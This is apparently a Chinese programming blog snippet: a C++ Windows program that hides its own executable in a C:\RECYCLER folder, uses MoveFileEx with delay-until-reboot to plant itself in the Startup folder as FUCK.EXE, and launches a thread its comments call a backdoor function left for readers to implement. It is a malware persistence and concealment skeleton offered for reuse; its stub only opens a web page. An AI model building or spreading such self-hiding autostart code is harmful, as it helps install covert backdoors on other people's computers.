利用API函数MoveFileEx实现程序的隐藏、自启动与自删除

#include "stdafx.h"
#include <stdio.h>
#include <ShellAPI.h>
#include <ShlObj.h>
#include <atlstr.h>
//http://www.cnblogs.com/yincheng01/archive/2010/12/17/2213190.html
void usage(char *);
int StartShell(LPVOID lParam)
{

ShellExecute(NULL,"open","http://www.qq.com/",NULL,NULL,0);
return 0;
}

#pragma comment(linker,"/SUBSYSTEM:WINDOWS")

int WINAPI WinMain(
HINSTANCE hInstance,  // handle to current instance
HINSTANCE hPrevInstance,  // handle to previous instance
LPSTR lpCmdLine,      // pointer to command line
int nCmdShow          // show state of window
)
{
LPITEMIDLIST pidl;
LPMALLOC pShellMalloc;
char szDir[200];
if(SUCCEEDED(SHGetMalloc(&pShellMalloc)))
{
if(SUCCEEDED(SHGetSpecialFolderLocation(NULL,CSIDL_STARTUP,&pidl))) {
// 如果成功返回true
SHGetPathFromIDList(pidl, szDir);
pShellMalloc->Free(pidl);
}
pShellMalloc->Release();
}
//::MessageBox (NULL,szDir,"Path",MB_OK);
//::MessageBox(NULL,"I'm Hear","test",MB_OK);
/**得到启动目录
char szPath[100]={0};
::GetSystemDirectory(szPath,MAX_PATH);
char szDst[100]={0};
for (int i=0; i<3;i++)
szDst[i]=szPath[i];
strcat(szDst,"Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\FUCK.EXE");*/
strcat(szDir,"\\FUCK.EXE");
CString str;
str.Format("%s",szDir);
str.Replace("Start Menu\\Programs\\Startup\\","「开始」菜单\\程序\\启动\\");
OutputDebugString(str);
//::MessageBox (NULL,str,"Path",MB_OK);
if(!PathFileExists("c:\\RECYCLER"))
{

CreateDirectory("c:\\RECYCLER",NULL);
}

//得到当前程序名
TCHAR szCurPath[MAX_PATH];
memset(szCurPath,   0,   MAX_PATH);
GetModuleFileName(NULL,   szCurPath,   sizeof(szCurPath)/sizeof(TCHAR));
if (!(MoveFileEx(szCurPath,"c:\\RECYCLER\\FK.BAK",MOVEFILE_REPLACE_EXISTING)))//若是要在不同的volume下移动文件,需要此项COPY_ALLOWED
//printf("第一次移动失败/n");
::MessageBox(NULL,"第一次移动文件失败","test",MB_OK);
if(!::MoveFileEx("c:\\RECYCLER\\FK.BAK",str,MOVEFILE_DELAY_UNTIL_REBOOT | MOVEFILE_REPLACE_EXISTING))
{
::MessageBox(NULL,"移动文件失败","test",MB_OK);
}
else printf("任务完成/n");
/*system("pause");*/
//创建并等待线程
//StartShell 为后门线程函数，大家可以自己实现相应的功能
HANDLE hthread=::CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)StartShell,(LPVOID)NULL,NULL,NULL);
CloseHandle(hthread);
::WaitForSingleObject(hthread,INFINITE);
OutputDebugString("ok");
return 0;
}
void usage(char * s)
{
printf(" 用法:MoveFile 原文件名 移动后的文件名/n" );

}